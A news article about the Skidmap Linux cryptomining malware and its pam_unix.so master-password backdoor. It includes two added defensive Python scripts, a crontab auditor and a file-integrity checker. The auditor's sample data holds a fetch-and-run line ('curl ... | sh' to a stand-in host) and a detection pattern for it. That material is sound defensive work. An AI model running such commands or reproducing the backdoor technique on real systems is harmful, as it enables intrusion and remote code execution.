New Linux malware mines crypto after installing backdoor with secret master password

Cybersecurity researchers have identified a new strain of Linux malware that not only mines cryptocurrency illicitly, but provides the attackers with universal access to an infected system via a “secret master password.”

TrendMicro’s latest blog post also reveals that the malware, dubbed Skidmap, attempts to mask its cryptocurrency mining by faking network traffic and CPU-related statistics.

High CPU usage is considered the primary red flag of illicit cryptocurrency mining, which makes this functionality particularly dangerous.

According to TrendMicro’s researchers, Skidmap demonstrates the “increasing complexity” of recent cryptocurrency-mining threats.

Cryptocurrency mining malware is still a very real threat

Initial infection occurs through crontab, the standard facility on Unix-like systems for scheduling jobs to run periodically.
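Because the infection is seeded through crontab, one of the first things a defender can do is audit scheduled jobs for the hallmarks of cron-based persistence. The following is an added example written for this article, not code from TrendMicro or from the malware analysis; the crontab contents, hostnames and paths are constructed, and the two heuristics (jobs that run from world-writable temporary directories, and jobs that pipe downloaded content into a shell) are assumptions about what is worth flagging, not indicators taken from the Skidmap report.

```python
"""Audit crontab entries for patterns commonly associated with
cron-based persistence on Linux. Added example; not from the original article."""
import re
import sys

# Constructed sample crontab; every path and host below is illustrative only.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
SHELL=/bin/sh
PATH=/usr/bin:/bin
0 3 * * * /usr/bin/logrotate /etc/logrotate.conf
*/10 * * * * curl -fsSL http://example.invalid/update.sh | sh
@reboot /tmp/.x/loader
15 4 * * 0 /usr/local/bin/backup.sh
"""

# Heuristics (assumptions for this example, not indicators from the report).
SUSPICIOUS_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
DOWNLOAD_TO_SHELL = re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b")


def parse_entries(text):
    """Return (schedule, command) tuples, skipping comments, blank lines
    and environment assignments such as SHELL=/bin/sh."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if re.match(r"^[A-Za-z_][A-Za-z0-9_]*=", line):
            continue
        if line.startswith("@"):          # @reboot, @daily, ... : one schedule field
            fields, n = line.split(None, 1), 1
        else:                             # five time fields, then the command
            fields, n = line.split(None, 5), 5
        if len(fields) <= n:
            continue                      # malformed line with no command field
        entries.append((" ".join(fields[:n]), fields[n]))
    return entries


def audit_crontab(text):
    """Return a list of findings; each has the schedule, the command and
    the reasons it was flagged."""
    findings = []
    for schedule, command in parse_entries(text):
        reasons = []
        if any(d in command for d in SUSPICIOUS_DIRS):
            reasons.append("runs from a world-writable temporary directory")
        if DOWNLOAD_TO_SHELL.search(command):
            reasons.append("pipes downloaded content into a shell")
        if reasons:
            findings.append({"schedule": schedule, "command": command,
                             "reasons": reasons})
    return findings


if __name__ == "__main__":
    # Pass a crontab file (e.g. /etc/crontab) as the argument, or run on the sample.
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_CRONTAB
    for f in audit_crontab(text):
        print(f"{f['schedule']:<14} {f['command']}\n    -> {'; '.join(f['reasons'])}")
```

On a live system the same function can be run over `/etc/crontab`, the files under `/etc/cron.d`, and the output of `crontab -l` for each user; the heuristics are deliberately narrow, so treat a hit as a prompt for a closer look rather than as proof of compromise.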

Skidmap then installs multiple malicious binaries, the first of which lowers the infected machine’s security settings so that it can begin mining cryptocurrency unhindered.

“Besides the backdoor access, Skidmap also creates another way for its operators to gain access to the machine,” wrote TrendMicro. “The malware replaces the system’s pam_unix.so file (the module responsible for standard Unix authentication) with its own malicious version […].”

“[T]his malicious pam_unix.so file accepts a specific password for any users, thus allowing the attackers to log in as any user in the machine,” added the firm.
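A trojanised pam_unix.so that accepts a fixed password for every account will still be loaded and used exactly like the genuine module, so authentication logs alone will not reveal it; what does reveal it is that the file on disk no longer matches what was installed. The example below is added here and is not code from TrendMicro or from the article; it records SHA-256 digests of files on a known-clean system and later reports any that are modified or missing. The candidate module paths are typical locations and are an assumption to confirm for your distribution, and `simulate_module_swap` works on constructed files in a temporary directory so that the check can be exercised offline.

```python
"""Detect in-place replacement of files such as pam_unix.so by comparing
SHA-256 digests against a baseline. Added example; not from the original article."""
import hashlib
import os
import tempfile

# Typical locations of pam_unix.so (assumption; verify for your distribution).
PAM_MODULE_CANDIDATES = [
    "/lib/x86_64-linux-gnu/security/pam_unix.so",
    "/lib64/security/pam_unix.so",
    "/usr/lib64/security/pam_unix.so",
]


def sha256_of(path, chunk=1 << 16):
    """Stream the file through SHA-256 so large binaries are not read at once."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def record_baseline(paths):
    """Map each path to its digest. Run this only on a system you trust,
    and keep the result somewhere the host cannot silently rewrite it."""
    return {p: sha256_of(p) for p in paths}


def verify_baseline(baseline):
    """Return {path: 'ok' | 'modified' | 'missing'} for every baselined file."""
    results = {}
    for path, expected in baseline.items():
        if not os.path.exists(path):
            results[path] = "missing"
        elif sha256_of(path) != expected:
            results[path] = "modified"
        else:
            results[path] = "ok"
    return results


def simulate_module_swap():
    """Constructed demonstration: baseline two fake modules in a temp dir,
    overwrite one of them, and return what verification reports."""
    with tempfile.TemporaryDirectory() as d:
        module = os.path.join(d, "pam_unix.so")
        other = os.path.join(d, "pam_env.so")
        with open(module, "wb") as f:
            f.write(b"original module bytes")    # constructed content
        with open(other, "wb") as f:
            f.write(b"untouched module bytes")   # constructed content
        baseline = record_baseline([module, other])
        with open(module, "wb") as f:
            f.write(b"replaced module bytes")    # simulates the swap
        results = verify_baseline(baseline)
        return {os.path.basename(p): status for p, status in results.items()}


if __name__ == "__main__":
    present = [p for p in PAM_MODULE_CANDIDATES if os.path.exists(p)]
    if present:
        # On a real host you would store this baseline and re-verify later.
        for path, digest in record_baseline(present).items():
            print(f"{digest}  {path}")
    print(simulate_module_swap())
```

On a packaged system the package manager already holds a baseline: `rpm -V pam` on RPM-based distributions and `dpkg --verify libpam-modules` on Debian-based ones report files whose digest no longer matches the package. The approach above adds value when the baseline is kept off the host, since an attacker who can replace pam_unix.so can usually also edit local package databases.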

Additional binaries are dropped into the system to monitor the cryptocurrency miners as they work to generate digital money for the attackers.